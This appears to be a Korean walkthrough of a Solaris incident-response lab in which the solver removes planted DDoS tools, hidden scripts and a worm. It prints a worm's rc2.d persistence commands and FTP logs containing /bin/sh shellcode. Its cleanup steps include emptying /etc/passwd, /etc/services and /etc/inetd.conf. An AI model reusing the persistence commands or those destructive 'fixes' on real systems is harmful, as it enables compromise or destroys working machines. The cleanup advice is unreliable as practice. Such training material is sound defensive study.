root 480 1 0 Apr 20 ? 0:00 /usr/lib/lpsched
root 530 528 0 Apr 20 ? 0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 Apr 20 ? 0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 Apr 20 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 Apr 20 ? 0:01 /usr/sbin/vold
root 515 1 0 Apr 20 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 Apr 20 ? 0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 24707 24699 0 00:16:01 pts/2 0:00 sh
root 596 1 0 Apr 20 ? 0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 Apr 20 ? 0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ? 0:00 /usr/sbin/sadmind
root 689 1 0 Apr 20 ? 0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 Apr 20 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 Apr 20 ? 0:00 mibiisa -r -p 32797
root 661 1 0 Apr 20 ? 0:00 /usr/lib/dmi/dmispd
root 734 699 0 Apr 20 ? 0:00 /usr/lib/saf/ttymon
root 22175 22094 0 23:40:49 pts/3 0:00 login -p -d /dev/pts/3 -h 210.99.
66.1
root 699 1 0 Apr 20 ? 0:00 /usr/lib/saf/sac -t 300
root 22094 418 0 23:39:29 ? 0:00 in.telnetd
root 24783 24707 0 00:16:38 pts/2 0:00 ps -ef
root 24663 24569 0 00:15:48 pts/2 0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 24569 418 0 00:14:28 ? 0:00 in.telnetd
root 3374 636 0 Apr 20 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 Apr 20 ? 0:00 /usr/openwin/bin/fbconsole -d :0
root 24767 1 0 00:16:36 ? 0:00 /dev/tfn2k
의심되는 프로세스인 /dev/tfn2k를 발견할 수 있습니다.
# cd /etc/rc.d
# ls -al
total 463
drwxr-xr-x 2 root other 512 Apr 22 00:16 .
drwxr-xr-x 44 root sys 12800 Apr 22 00:15 ..
-rw------- 1 root other 449392 May 13 2006 core
-rw-r--r-- 1 root other 233 Apr 22 00:16 rc.local
# cat rc.local
#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.
touch /var/lock/subsys/local
/dev/tfn2k
#
삭제 작업을 행해 줍니다.
# kill -9 25420
# cat /dev/null > /etc/rc.d/rc.local
# cd /dev
# ls tfn2k -al
-r-xr--r-- 1 root other 114132 Apr 22 00:23 tfn2k
# chattr -i tfn2k
# rm -rf tfn2k
# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Congratz! You made a success of challenge!
=====================================================
Question 11 - 특정 사고별 분석
=====================================================
before :
# ps -ef
UID PID PPID C STIME TTY TIME CMD
root 700 1 0 Apr 20 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 Apr 20 ? 0:00 ipmon -Ds
root 26107 24707 0 00:28:40 pts/2 0:00 ps -ef
root 65 1 0 Apr 20 ? 0:00 /usr/lib/sysevent/syseventd
root 79 1 0 Apr 20 ? 1:44 /usr/lib/picl/picld
root 74 1 0 Apr 20 ? 0:00 devfsadmd
root 185 1 0 Apr 20 ? 0:00 /usr/lib/inet/in.ndpd
root 418 1 0 Apr 20 ? 0:00 /usr/sbin/rcinetd -s
root 204 1 0 Apr 20 ? 0:00 /usr/sbin/rpcbind
root 454 1 0 Apr 20 ? 0:00 /usr/sbin/cron
root 445 1 0 Apr 20 ? 0:00 /usr/sbin/rcsyslogd
root 469 1 0 Apr 20 ? 0:01 /usr/sbin/nscd
root 431 1 0 Apr 20 ? 0:00 /usr/lib/nfs/lockd
root 419 1 0 Apr 20 ? 0:00 /usr/sbin/in.named
root 467 1 0 Apr 20 ? 0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 Apr 20 ? 0:00 /usr/lib/autofs/automountd
root 496 1 0 Apr 20 ? 0:00 /usr/lib/power/powerd
root 480 1 0 Apr 20 ? 0:00 /usr/lib/lpsched
root 530 528 0 Apr 20 ? 0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 Apr 20 ? 0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 Apr 20 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 Apr 20 ? 0:01 /usr/sbin/vold
root 515 1 0 Apr 20 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 Apr 20 ? 0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 24707 24699 0 00:16:01 pts/2 0:00 sh
root 596 1 0 Apr 20 ? 0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 Apr 20 ? 0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ? 0:00 /usr/sbin/sadmind
root 689 1 0 Apr 20 ? 0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 Apr 20 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 Apr 20 ? 0:00 mibiisa -r -p 32797
root 661 1 0 Apr 20 ? 0:00 /usr/lib/dmi/dmispd
root 734 699 0 Apr 20 ? 0:00 /usr/lib/saf/ttymon
root 22175 22094 0 23:40:49 pts/3 0:00 login -p -d /dev/pts/3 -h 210.99.
66.1
root 699 1 0 Apr 20 ? 0:00 /usr/lib/saf/sac -t 300
root 22094 418 0 23:39:29 ? 0:00 in.telnetd
root 24663 24569 0 00:15:48 pts/2 0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 24569 418 0 00:14:28 ? 0:00 in.telnetd
root 3374 636 0 Apr 20 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 Apr 20 ? 0:00 /usr/openwin/bin/fbconsole -d :0
after :
# ps -ef
UID PID PPID C STIME TTY TIME CMD
root 700 1 0 Apr 20 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 Apr 20 ? 0:00 ipmon -Ds
root 26737 1 0 00:32:52 ? 0:00 /usr/src/.poop/hackl.sh
root 65 1 0 Apr 20 ? 0:00 /usr/lib/sysevent/syseventd
root 79 1 0 Apr 20 ? 1:44 /usr/lib/picl/picld
root 74 1 0 Apr 20 ? 0:00 devfsadmd
root 185 1 0 Apr 20 ? 0:00 /usr/lib/inet/in.ndpd
root 418 1 0 Apr 20 ? 0:00 /usr/sbin/rcinetd -s
root 204 1 0 Apr 20 ? 0:00 /usr/sbin/rpcbind
root 454 1 0 Apr 20 ? 0:00 /usr/sbin/cron
root 445 1 0 Apr 20 ? 0:00 /usr/sbin/rcsyslogd
root 469 1 0 Apr 20 ? 0:01 /usr/sbin/nscd
root 431 1 0 Apr 20 ? 0:00 /usr/lib/nfs/lockd
root 419 1 0 Apr 20 ? 0:00 /usr/sbin/in.named
root 467 1 0 Apr 20 ? 0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 Apr 20 ? 0:00 /usr/lib/autofs/automountd
root 496 1 0 Apr 20 ? 0:00 /usr/lib/power/powerd
root 480 1 0 Apr 20 ? 0:00 /usr/lib/lpsched
root 530 528 0 Apr 20 ? 0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 Apr 20 ? 0:00 /usr/lib/sendmail -bd -q15m
root 26883 24707 0 00:33:39 pts/2 0:00 ps -ef
root 517 515 0 Apr 20 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 Apr 20 ? 0:01 /usr/sbin/vold
root 515 1 0 Apr 20 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 Apr 20 ? 0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 24707 24699 0 00:16:01 pts/2 0:00 sh
root 596 1 0 Apr 20 ? 0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 Apr 20 ? 0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ? 0:00 /usr/sbin/sadmind
root 689 1 0 Apr 20 ? 0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 Apr 20 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 Apr 20 ? 0:00 mibiisa -r -p 32797
root 661 1 0 Apr 20 ? 0:00 /usr/lib/dmi/dmispd
root 734 699 0 Apr 20 ? 0:00 /usr/lib/saf/ttymon
root 22175 22094 0 23:40:49 pts/3 0:00 login -p -d /dev/pts/3 -h 210.99.
66.1
root 699 1 0 Apr 20 ? 0:00 /usr/lib/saf/sac -t 300
root 22094 418 0 23:39:29 ? 0:00 in.telnetd
root 26745 1 0 00:32:52 ? 0:00 /usr/src/.poop/hackw.sh
root 24663 24569 0 00:15:48 pts/2 0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 24569 418 0 00:14:28 ? 0:00 in.telnetd
root 3374 636 0 Apr 20 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 Apr 20 ? 0:00 /usr/openwin/bin/fbconsole -d :0
root 26769 1 0 00:32:52 ? 0:00 /usr/src/.poop/synscan
root 26753 1 0 00:32:52 ? 0:00 /usr/src/.poop/scan.sh
root 26761 1 0 00:32:52 ? 0:00 /usr/src/.poop/start.sh
삭제 작업에 들어갑니다.
# kill -9 26761
# kill -9 26753
# kill -9 26769
# kill -9 26745
# kill -9 26737
# rm -rf /usr/src/.poop/
rm: cannot remove `/usr/src/.poop//core': Permission denied
# rm -rf /sbin/asp
# cat /dev/null > /etc/inetd.conf
# cd /etc/rc.d
# ls -al
total 484
drwxr-xr-x 2 root other 512 Apr 22 00:32 .
drwxr-xr-x 44 root sys 12800 Apr 22 00:15 ..
-rw------- 1 root other 449392 May 13 2006 core
-rw-r--r-- 1 root other 22407 Apr 22 00:32 rc.sysinit
# cat /dev/null > rc.sysinit
# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Congratz! You made a success of challenge!
=====================================================
Question 12 - 불법 Upload에 대한 대처
=====================================================
# find / -name ftp 2> /dev/null
/usr/bin/ftp
/usr/ucb/ftp
/mnt/etc/pam.d/ftp
/mnt/home/ftp
/mnt/usr/bin/ftp
/home/ftp
/home1/user001/ftp
# cd /home/ftp
# ls -al
total 6
drwxr-xr-x 6 root root 512 Nov 5 2000 .
drwxr-xr-x 6 root root 512 Nov 30 2004 ..
d--x--x--x 2 root root 512 Nov 5 2000 bin
d--x--x--x 2 root root 512 Nov 5 2000 etc
drwxr-xr-x 2 root root 512 Nov 5 2000 lib
drwxr-sr-x 2 root 50 512 Feb 5 2000 pub
# cd /home1/user001/ftp
# ls -al
total 5
drwxr-xr-x 5 root other 512 Apr 22 00:37 .
drwxr-xr-x 3 user001 training 512 Apr 22 00:37 ..
drwxr-xr-x 2 root other 512 Apr 22 00:37 bin
drwxr-xr-x 2 root other 512 Apr 22 00:37 etc
drwxr-xr-x 2 root other 512 Apr 22 00:37 incoming
# cd incoming
# ls -al
total 2
drwxr-xr-x 2 root other 512 Apr 22 00:37 .
drwxr-xr-x 5 root other 512 Apr 22 00:37 ..
-rw-r--r-- 1 root other 0 Apr 22 00:37 Home.Alone.1.avi
-rw-r--r-- 1 root other 0 Apr 22 00:37 Home.Alone.3.DVDRip.
.MM4.cDiAMOND.avi
-rw-r--r-- 1 root other 0 Apr 22 00:37 Home.Alone.4.2002.ST
Drip.XVID.avi
-rw-r--r-- 1 root other 0 Apr 22 00:37 Home.Alone.II.Lost.I
w.York.AC3.CD1-ADD.avi
-rw-r--r-- 1 root other 0 Apr 22 00:37 Home.Alone.II.Lost.I
w.York.AC3.CD2-ADD.avi
# rm -rf *
# ls -al
total 2
drwxr-xr-x 2 root other 512 Apr 22 00:39 .
drwxr-xr-x 5 root other 512 Apr 22 00:37 ..
# cd ..
# ls -al
total 5
drwxr-xr-x 5 root other 512 Apr 22 00:37 .
drwxr-xr-x 3 user001 training 512 Apr 22 00:37 ..
drwxr-xr-x 2 root other 512 Apr 22 00:37 bin
drwxr-xr-x 2 root other 512 Apr 22 00:37 etc
drwxr-xr-x 2 root other 512 Apr 22 00:39 incoming
# cat > .rhosts
# cat > .foward
# ls -al
total 5
drwxr-xr-x 5 root other 512 Apr 22 00:39 .
drwxr-xr-x 3 user001 training 512 Apr 22 00:37 ..
-rw-r--r-- 1 root other 0 Apr 22 00:39 .foward
-rw-r--r-- 1 root other 0 Apr 22 00:39 .rhosts
drwxr-xr-x 2 root other 512 Apr 22 00:37 bin
drwxr-xr-x 2 root other 512 Apr 22 00:37 etc
drwxr-xr-x 2 root other 512 Apr 22 00:39 incoming
# chmod 000 .foward
# chmod 000 .rhosts
# ls -al
total 5
drwxr-xr-x 5 root other 512 Apr 22 00:39 .
drwxr-xr-x 3 user001 training 512 Apr 22 00:37 ..
---------- 1 root other 0 Apr 22 00:39 .foward
---------- 1 root other 0 Apr 22 00:39 .rhosts
drwxr-xr-x 2 root other 512 Apr 22 00:37 bin
drwxr-xr-x 2 root other 512 Apr 22 00:37 etc
drwxr-xr-x 2 root other 512 Apr 22 00:39 incoming
# cd ..
# ls -al
total 8
drwxr-xr-x 3 user001 training 512 Apr 22 00:37 .
drwxr-xr-x 108 root root 2048 Apr 17 17:49 ..
-rw-r--r-- 1 user001 training 185 Apr 22 00:15 .profile
drwxr-xr-x 5 root other 512 Apr 22 00:39 ftp
-rw-r--r-- 1 user001 training 124 Apr 22 00:15 local.cshrc
-rw-r--r-- 1 user001 training 607 Apr 22 00:15 local.login
-rw-r--r-- 1 user001 training 582 Apr 22 00:15 local.profile
# chown root ftp
# chmod 555 ftp
# cd ./ftp/
# ls -al
total 5
dr-xr-xr-x 5 root other 512 Apr 22 00:39 .
drwxr-xr-x 3 user001 training 512 Apr 22 00:37 ..
---------- 1 root other 0 Apr 22 00:39 .foward
---------- 1 root other 0 Apr 22 00:39 .rhosts
drwxr-xr-x 2 root other 512 Apr 22 00:37 bin
drwxr-xr-x 2 root other 512 Apr 22 00:37 etc
drwxr-xr-x 2 root other 512 Apr 22 00:39 incoming
# chmod 111 bin
# chmod 111 etc
# ps -ef | grep ftp
root 28156 28143 0 00:42:26 ? 0:00 in.ftpd
root 28145 28143 0 00:42:26 ? 0:00 in.ftpd
root 28158 28143 0 00:42:26 ? 0:00 in.ftpd
root 28159 28143 0 00:42:26 ? 0:00 in.ftpd
root 28155 28143 0 00:42:26 ? 0:00 in.ftpd
root 28154 28143 0 00:42:26 ? 0:00 in.ftpd
root 28147 28143 0 00:42:26 ? 0:00 in.ftpd
root 28151 28143 0 00:42:26 ? 0:00 in.ftpd
root 28150 28143 0 00:42:26 ? 0:00 in.ftpd
root 28149 28143 0 00:42:26 ? 0:00 in.ftpd
root 28148 28143 0 00:42:26 ? 0:00 in.ftpd
root 28526 24707 0 00:46:38 pts/2 0:00 grep ftp
root 28146 28143 0 00:42:26 ? 0:00 in.ftpd
# kill -9 28156
# kill -9 28145
# kill -9 28158
# kill -9 28159
# kill -9 28154
# kill -9 28147
# kill -9 28151
# kill -9 28149
# kill -9 28148
# kill -9 28146
# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Congratz! You made a success of challenge!
=====================================================
Question 13 - 악성 프로그램 분석 절차 습득 =====================================================
# ls -alQ
total 537
drwxr-xr-x 2 root other 512 Apr 22 00:58 "."
drwxr-xr-x 5 root other 512 May 6 2006 ".."
-r-xr--r-- 1 root other 80896 Apr 22 00:58 ".. "
-rw------- 1 root other 457584 May 6 2006 "core"
파일이 하나 숨겨져 있는것을 볼 수 있습니다.
파일을 home으로 복사해 옵니다.
# cp ".. " /home1/user001/
# cd /home1/user001
# ls -al
total 86
drwxr-xr-x 2 user001 training 512 Apr 22 01:00 .
drwxr-xr-x 108 root root 2048 Apr 17 17:49 ..
-rw-r--r-- 1 root other 80896 Apr 22 01:00 ..
-rw-r--r-- 1 user001 training 185 Apr 22 00:15 .profile
-rw-r--r-- 1 user001 training 124 Apr 22 00:15 local.cshrc
-rw-r--r-- 1 user001 training 607 Apr 22 00:15 local.login
-rw-r--r-- 1 user001 training 582 Apr 22 00:15 local.profile
# tar -xvf ".. "
x ./.ami, 79132 bytes, 155 tape blocks
# ls -al
total 164
drwxr-xr-x 2 user001 training 512 Apr 22 01:00 .
drwxr-xr-x 108 root root 2048 Apr 17 17:49 ..
-rw-r--r-- 1 root other 80896 Apr 22 01:00 ..
-rwxr-xr-x 1 root other 79132 Dec 24 2003 .ami
-rw-r--r-- 1 user001 training 185 Apr 22 00:15 .profile
-rw-r--r-- 1 user001 training 124 Apr 22 00:15 local.cshrc
-rw-r--r-- 1 user001 training 607 Apr 22 00:15 local.login
-rw-r--r-- 1 user001 training 582 Apr 22 00:15 local.profile
# file .ami
.ami: ELF 32-bit MSB executable SPARC Version 1, dynamically linked, n
ot stripped
파일로 부터 정보를 수집합니다.
# strings .ami
dotdot
/bin
/sbin
/etc
/usr/bin
/usr/sbin
/usr/ucb
/usr/ccs/bin
/usr/local/bin
/usr/local/sbin
/opt
This programm is running on U x environmentaion@ .netTCP 1 5%s/%s/pid%d.%s
.cache
/etc/.evrc
RC_ROOT
Error : Unknown system error.
Error : Not a training user.
Removing %s/*..
# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > 의심스러운 프로그램의 실행 운영체제 환경은?
Answer > U x
Question > 이 프로그램을 작성한 것으로 간주되는 사람의 메일 주소는?
Answer > aion@ .net
Question > 악성 프로그램이 사용할 것으로 의심되는 서비스와 포트는(예 TCP 23)?
Answer > TCP 1 5
Congratz! You made a success of challenge!
=====================================================
Question 14 - Monitoring
=====================================================
# kill -9 1591
# ls /usr/lib/.*bug* -al
-r-xr--r-- 1 root other 115624 Apr 22 01:20 /usr/lib/.bugtraq
-rw-r--r-- 1 root other 0 Apr 22 01:20 /usr/lib/.bugtraq.c
-rw-r--r-- 1 root other 0 Apr 22 01:20 /usr/lib/.uubugtraq
# rm -rf /usr/lib/.bugtraq
# rm -rf /usr/lib/.bugtraq.c
# rm -rf /usr/lib/.uubugtraq
#
#
finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Congratz! You made a success of challenge!
=====================================================
Question 15 - Investigation
=====================================================
ftp 관련 문제점이라고 하길래,
log에서 ftp 관련된게 있나 찾아 보았습니다.
# cat messages* | grep ftp
Apr 20 20:17:24 cert inetd[418]: [ID 965992 daemon.error] ftp/tcp: unknown servi
ce
cat: cannot open Sep 28 14:46:25 victim ftpd[14989]: ANONYMOUS FTP LOGIN FROM gr
over.tester.org [192.168.222.1], ???????????????????????????????????????????????
????????????????????????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????????????????????????
????????????????????????????????1A1U1E°FI?1A1UC‰UA°?I?ek^1A1E?^^A?F^Df¹y^A
°'I?1A?^^A°=I?1A1U?^^H‰C^B1EþE1A?^^H°^LI?þEuo1A?F^I?^^H°=I?þ^N°0þE
?F^D1A?F^G‰v^H‰F^L‰o?N^H?V^L°^KI?1A1U°^AI?e?yyy0bin0sh1..11
4
Sep 28 14:46:25 victim ftpd[14989]: ANONYMOUS FTP LOGIN FROM grover.tester.org [
192.168.222.1], ????????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????????????????????????
????????????????????????????????????????????????????????????????????????????????
???????????????1A1U1E°FI?1A1UC‰UA°?I?ek^1A1E?^^A?F^Df¹y^A°'I?1A?^^A°=I
?1A1U?^^H‰C^B1EþE1A?^^H°^LI?þEuo1A?F^I?^^H°=I?þ^N°0þE?F^D1A?F^G‰v^H
‰F^L‰o?N^H?V^L°^KI?1A1U°^AI?e?yyy0bin0sh1..11
무언가 공격을 시도한 것으로 보입니다.
이제 inetd.conf를 unset해주고 inetd 데몬을 재시작 시켜 줍니다.
#
cat /dev/null > /etc/inetd.conf
# ps -ef | grep inetd
root 418 1 0 Apr 20 ? 0:00 /usr/sbin/rcinetd -s
root 8394 1 0 11:06:56 ? 0:00 /usr/sbin/inetd -s
root 8525 6638 0 11:08:59 pts/2 0:00 grep inetd
# kill -HUP 8394
#
finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Question > 로그 기록상 공격자의 IP 로 추정되는 곳은?
Answer >
192.168.222.1
Congratz! You made a success of challenge!
=====================================================
Question 16 - 시스템 상태 분석
=====================================================
파일 크기가 다르면 잘 안되나 보다 -_- fuck..
=====================================================
Question 17 - BIND 취약점
=====================================================
/etc/named.conf에 다음과 같은 한줄을 추가 시켜줍니다.
# vi /etc/named.conf
"/etc/named.conf" 21 lines, 331 characters
options {
recursion no;
directory "/var/named";
};
저장하고, /usr/sbin/named를 실행시켜주면 끝입니다.
# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Congratz! You made a success of challenge!
=====================================================
Question 18 - 로그설정(서버, 라우터)
=====================================================
이 문제는 현재 풀이가 불가능한 상태로 보인다.
=====================================================
Question 19 - 로그 분석 영역
=====================================================
# challenge 19
Now, You are challenging question 19.
Good Luck!
# /usr/local/bin/chklastlog
user vision deleted or never loged from lastlog!
# cat /dev/null > /etc/passwd
# cd /home1/vision
# ls -al
total 11
drwxr-xr-x 2 root other 2560 Apr 22 13:10 .
drwxr-xr-x 108 root root 2048 Apr 17 17:49 ..
-rw-r--r-- 1 root other 5381 Apr 22 13:10 zap2.c
# rm -rf zap2.c
# finish
Do you want to check your result of challenge?
Select [Y]es or [N]o : y
Congratz! You made a success of challenge!
=====================================================
Question 20 - 특정 사고별 분석
=====================================================
# ps -ef
UID PID PPID C STIME TTY TIME CMD
root 700 1 0 Apr 20 console 0:00 /usr/lib/saf/ttymon -g -h -p cert
console login: -T sun -d /dev/console -l con
root 168 1 0 Apr 20 ? 0:00 ipmon -Ds
root 16670 16662 0 13:08:54 pts/2 0:00 sh
root 65 1 0 Apr 20 ? 0:00 /usr/lib/sysevent/syseventd
root 79 1 0 Apr 20 ? 2:26 /usr/lib/picl/picld
root 74 1 0 Apr 20 ? 0:00 devfsadmd
root 185 1 0 Apr 20 ? 0:00 /usr/lib/inet/in.ndpd
root 418 1 0 Apr 20 ? 0:00 /usr/sbin/rcinetd -s
root 204 1 0 Apr 20 ? 0:00 /usr/sbin/rpcbind
root 454 1 0 Apr 20 ? 0:00 /usr/sbin/cron
root 445 1 0 Apr 20 ? 0:00 /usr/sbin/rcsyslogd
root 469 1 0 Apr 20 ? 0:01 /usr/sbin/nscd
root 431 1 0 Apr 20 ? 0:00 /usr/lib/nfs/lockd
root 419 1 0 Apr 20 ? 0:00 /usr/sbin/in.named
root 467 1 0 Apr 20 ? 0:00 /usr/platform/SUNW,Sun-Fire-880/l
ib/sf880drd
root 438 1 0 Apr 20 ? 0:00 /usr/lib/autofs/automountd
root 496 1 0 Apr 20 ? 0:00 /usr/lib/power/powerd
root 480 1 0 Apr 20 ? 0:00 /usr/lib/lpsched
root 530 528 0 Apr 20 ? 0:00 htt_server -port 9010 -syslog -me
ssage_locale C
root 525 1 0 Apr 20 ? 0:00 /usr/lib/sendmail -bd -q15m
root 517 515 0 Apr 20 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 521 1 0 Apr 20 ? 0:02 /usr/sbin/vold
root 515 1 0 Apr 20 ? 0:00 /usr/sadm/lib/smc/bin/smcboot
root 528 1 0 Apr 20 ? 0:00 /usr/lib/im/htt -port 9010 -syslo
g -message_locale C
root 17049 1 0 13:12:27 ? 0:00 /bin/vsh /dev/cuc/uniattack.sh
root 17035 1 0 13:12:27 ? 0:00 /dev/cuc/grabbb -t 3 -a 192.168.1
.20 -b 224.225.98.6 111
root 596 1 0 Apr 20 ? 0:00 /usr/lib/snmp/snmpdx -y -c /etc/s
nmp/conf
root 561 1 0 Apr 20 ? 0:00 /usr/lib/efcode/sparcv9/efdaemon
root 8974 1 0 13:38:07 ? 0:00 /usr/sbin/sadmind
root 689 1 0 Apr 20 ? 0:00 /usr/lib/dmi/snmpXdmid -s cert
root 636 1 0 Apr 20 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 656 596 0 Apr 20 ? 0:00 mibiisa -r -p 32797
root 661 1 0 Apr 20 ? 0:00 /usr/lib/dmi/dmispd
root 734 699 0 Apr 20 ? 0:00 /usr/lib/saf/ttymon
root 16524 418 0 13:06:58 ? 0:00 in.telnetd
root 699 1 0 Apr 20 ? 0:00 /usr/lib/saf/sac -t 300
root 17044 1 0 13:12:27 ? 0:00 /bin/vsh /dev/cuc/sadmin.sh
root 16606 16524 0 13:08:18 pts/2 0:00 login -p -d /dev/pts/2 -h 59.5.43
.67
root 3374 636 0 Apr 20 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 3375 636 0 Apr 20 ? 0:00 /usr/openwin/bin/fbconsole -d :0
root 17054 1 0 13:12:27 ? 0:00 /bin/vsh /dev/cuc/time.sh
root 17063 1 0 13:12:27 ? 0:00 /usr/local/bin/perl /dev/cuc/unia
ttack.pl 224.225.98.6:80
root 17074 16670 0 13:12:29 pts/2 0:00 ps -ef
#
worm의 프로세스로 추정되는 프로세스들을 찾았습니다.
해당 경로로 가서 파일들을 살펴 봅니다.
# cd /dev/cuc
# ls -al
total 805
drwxr-xr-x 2 root other 1024 Apr 22 13:12 .
drwxr-xr-x 20 root sys 4096 Apr 22 02:06 ..
-rw-r--r-- 1 root other 241 Apr 22 13:12 cmd.txt
-rw-r--r-- 1 root root 241 Apr 14 2006 cmd.txt.13
-rw-r--r-- 1 root root 241 Oct 26 2005 cmd.txt.33
-rw-r--r-- 1 root root 241 Oct 25 2005 cmd.txt.38
-r-xr--r-- 1 root other 115788 Apr 22 13:12 grabbb
-r-xr--r-- 1 root root 115788 Apr 14 2006 grabbb.13
-r-xr--r-- 1 root root 115788 Oct 26 2005 grabbb.33
-r-xr--r-- 1 root root 115788 Oct 25 2005 grabbb.38
-rw-r--r-- 1 root other 1591 Apr 22 13:12 sadmin.sh
-rw-r--r-- 1 root root 1591 Apr 14 2006 sadmin.sh.13
-rw-r--r-- 1 root root 1591 Oct 26 2005 sadmin.sh.33
-rw-r--r-- 1 root root 1591 Oct 25 2005 sadmin.sh.38
-rw-r--r-- 1 root other 566 Apr 22 13:12 time.sh
-rw-r--r-- 1 root root 566 Apr 14 2006 time.sh.13
-rw-r--r-- 1 root root 566 Oct 26 2005 time.sh.33
-rw-r--r-- 1 root root 566 Oct 25 2005 time.sh.38
-rw-r--r-- 1 root other 67798 Apr 22 13:12 uniattack.pl
-rw-r--r-- 1 root root 67798 Apr 14 2006 uniattack.pl.13
-rw-r--r-- 1 root root 67798 Oct 26 2005 uniattack.pl.33
-rw-r--r-- 1 root root 67798 Oct 25 2005 uniattack.pl.38
-rw-r--r-- 1 root other 646 Apr 22 13:12 uniattack.sh
-rw-r--r-- 1 root root 646 Apr 14 2006 uniattack.sh.13
-rw-r--r-- 1 root root 646 Oct 26 2005 uniattack.sh.33
-rw-r--r-- 1 root root 646 Oct 25 2005 uniattack.sh.38
# cat cmd.txt
/bin/echo "/bin/nohup /dev/cuc/start.sh >/dev/null 2>&1 &" > /etc/rc2.d/tmp1
/bin/cat /etc/rc2.d/S71rpc >> /etc/rc2.d/tmp1
/bin/mv /etc/rc2.d/S71rpc /etc/rc2.d/tmp2
/bin/mv /etc/rc2.d/tmp1 /etc/rc2.d/S71rpc
/bin/chmod 744 /etc/rc2.d/S71rpc
#
해당 폴더, /etc/rc2.d/tmp1,/etc/rc2.d/S71rpc,/etc/rc2.d/tmp2 등을 지우고,
악성 프로세스들을 모두 죽입니다.
# ps -ef|grep cuc
root 17049 1 0 13:12:27 ? 0:00 /bin/vsh /dev/cuc/uniattack.sh
root 17035 1 0 13:12:27 ? 0:00 /dev/cuc/grabbb -t 3 -a 192.168.1
.20 -b 224.225.98.6 111
root 17044 1 0 13:12:27 ? 0:00 /bin/vsh /dev/cuc/sadmin.sh
root 17054 1 0 13:12:27 ? 0:00 /bin/vsh /dev/cuc/time.sh
root 17063 1 0 13:12:27 ? 0:00 /usr/local/bin/perl /dev/cuc/unia
ttack.pl 224.225.98.6:80
root 17268 16670 0 13:15:39 pts/2 0:00 grep cuc
#
# kill -9 17049
# kill -9 17035
# kill -9 17044
# kill -9 17054
# kill -9 17063
# rm -rf /dev/cuc/
rm: cannot remove `/dev/cuc//cmd.txt.38': Permission denie
rm: cannot remove `/dev/cuc//sadmin.sh.38': Permission den
rm: cannot remove `/dev/cuc//uniattack.sh.38': Permission
rm: cannot remove `/dev/cuc//time.sh.38': Permission denie
rm: cannot remove `/dev/cuc//uniattack.pl.38': Permission
rm: cannot remove `/dev/cuc//grabbb.38': Permission denied
rm: cannot remove `/dev/cuc//cmd.txt.13': Permission denie
rm: cannot remove `/dev/cuc//sadmin.sh.13': Permission den
rm: cannot remove `/dev/cuc//uniattack.sh.13': Permission
rm: cannot remove `/dev/cuc//time.sh.13': Permission denie
rm: cannot remove `/dev/cuc//uniattack.pl.13': Permission
rm: cannot remove `/dev/cuc//cmd.txt.33': Permission denie
rm: cannot remove `/dev/cuc//sadmin.sh.33': Permission den
rm: cannot remove `/dev/cuc//uniattack.sh.33': Permission
rm: cannot remove `/dev/cuc//time.sh.33': Permission denie
rm: cannot remove `/dev/cuc//uniattack.pl.33': Permission
rm: cannot remove `/dev/cuc//grabbb.33': Permission denied
rm: cannot remove `/dev/cuc//grabbb.13': Permission denied
# rm -rf /etc/rc2.d/tmp1
# rm -rf /etc/rc2.d/S71rpc
# rm -rf /etc/rc2.d/tmp2
# cat /dev/null > /etc/services
# cat /dev/null > /etc/inetd.conf
# finish
